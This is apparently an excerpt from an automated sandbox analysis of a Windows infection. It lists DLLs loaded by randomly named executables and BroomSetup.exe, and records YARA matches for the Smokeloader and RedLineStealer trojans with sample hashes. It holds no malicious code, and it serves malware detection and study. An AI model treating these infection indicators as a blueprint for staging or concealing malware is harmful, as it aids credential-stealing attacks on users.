                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: msacm32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: riched20.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: usp10.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: msls31.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: explorerframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: sfc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: sfc_os.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: propsys.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: dwmapi.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: oleacc.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: version.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: shfolder.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: wininet.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: msvcr100.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: version.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: secur32.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: dbghelp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: wininet.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: propsys.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: winmm.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: dbgcore.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: netutils.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: schannel.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: version.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: secur32.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: dbghelp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: wininet.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: propsys.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: winmm.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: dbgcore.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeSection loaded: msvcr100.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: propsys.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: dwmapi.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: oleacc.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: version.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: shfolder.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: textinputframework.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: coreuicomponents.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: coremessaging.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: coremessaging.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wtsapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wkscli.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: cscapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: winsta.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: colorui.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: mscms.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coloradapterclient.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: compstui.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: inetres.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exeSection loaded: apphelp.dll
                    Source: 0000002E.00000002.3117097610.0000000000570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 0000001C.00000002.3370878314.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000020.00000002.3324630300.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 0000002E.00000002.3117320698.00000000006F2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000025.00000002.3137395585.00000000007C2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000025.00000002.3136775469.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 0000001C.00000002.3386959537.0000000000732000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000016.00000002.3368358435.0000000000652000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000019.00000002.2841787321.0000000000800000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000020.00000002.3324821241.0000000000722000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
